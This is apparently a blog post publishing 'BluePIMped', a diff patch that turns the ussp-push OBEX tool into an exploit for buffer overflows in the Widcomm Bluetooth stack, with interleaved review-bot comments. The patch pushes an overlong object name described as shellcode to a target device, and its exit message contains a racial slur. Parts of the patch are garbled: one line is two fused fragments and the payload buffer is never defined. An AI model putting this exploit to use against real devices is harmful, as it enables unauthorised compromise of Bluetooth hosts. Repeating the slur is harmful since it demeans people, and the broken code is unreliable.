BluePIMped

Patch for ussp-push that allows you to exploit the overflows discovered in the Widcomm BTStackServer.

— ussp-push-0.4/obex_main.c 2005-06-01 18:32:59.000000000 -0400
+++ ussp-push-0.4-kf/obex_main.c 2005-12-03 11:49:32.000000000 -0500
@@ -1,4 +1,10 @@
/*
+ http://www.digitalmunition.com
+ Moded by KF (kf_lists[at]digitalmunition[dot]com) to exploit the Widcomm Overflows from PenTest.
+ http://www.pentest.co.uk/documents/ptl-2004-03.html
+
+*/
+/*
* UNrooted.net example code
*
* Most of these functions are just rips from the Affix Bluetooth project OBEX
@@ -62,7 +68,10 @@

#include “obex_socket.h”

-#define UPUSH_APPNAME “ussp-push v0.4”
+#include
+#include
+
+#define UPUSH_APPNAME “BluePIMped v0.1”
#define BT_SERVICE “OBEX”
#define OBEX_PUSH 5

@@ -316,6 +325,9 @@
switch (event) {
case OBEX_EV_PROGRESS:
printf(“Made some progress…\n”);
+ sleep(3);
+ printf(“Peace nigga…\n”);
+ exit(0);
break;

case OBEX_EV_ABORT:
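Review bot: `exit(0)` inside the `OBEX_EV_PROGRESS` case ends the process from within the event callback, so the `break` that follows is dead code and any teardown the caller performs after the transfer is skipped. The status 0 also reports success whether or not the transfer completed, which hides failures from anything that wraps this tool. The string printed just before the exit contains a slur and should not appear in tool output. The enclosing switch and function begin and end outside this hunk.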
@@ -382,9 +394,7 @@
name = remote;

name_len = (strlen(name)+1)\Name with shellcode
+ if ( obex_push( (void *)argv[1], “/etc/hosts”, “YouAreBeingPwnedViaBlueTooth”) != 0 ) {
+ printf( “error\n” );
+ return( -1 );
+ }
+ printf(“\nsleeping 3 seconds before triggering the shellcode\n”);
+ sleep(3);
+ if ( obex_push( (void *)argv[1], “/etc/hosts”, buf ) != 0 ) {
printf( “error\n” );
return( -1 );
}
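Review bot: The second `obex_push` call sends `buf` as the remote object name, yet nothing in the visible hunk declares, sizes or fills `buf`, and the line `name_len = (strlen(name)+1)\Name with shellcode` is two fragments fused together, so part of the patch was lost when the page was published. What remains shows the oversized data travelling in the OBEX name field, presumably the field the referenced advisory covers; a receiving stack has to bound that length before copying it. For detection, the first push uses the fixed name `YouAreBeingPwnedViaBlueTooth`, which is a usable indicator in OBEX logs or captures for this unmodified build. A comment such as `/* third argument is the remote object name; the second call puts buf there */` would make the intent readable. The enclosing functions begin and end outside the hunk.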


~ by Balle on July 6, 2007.
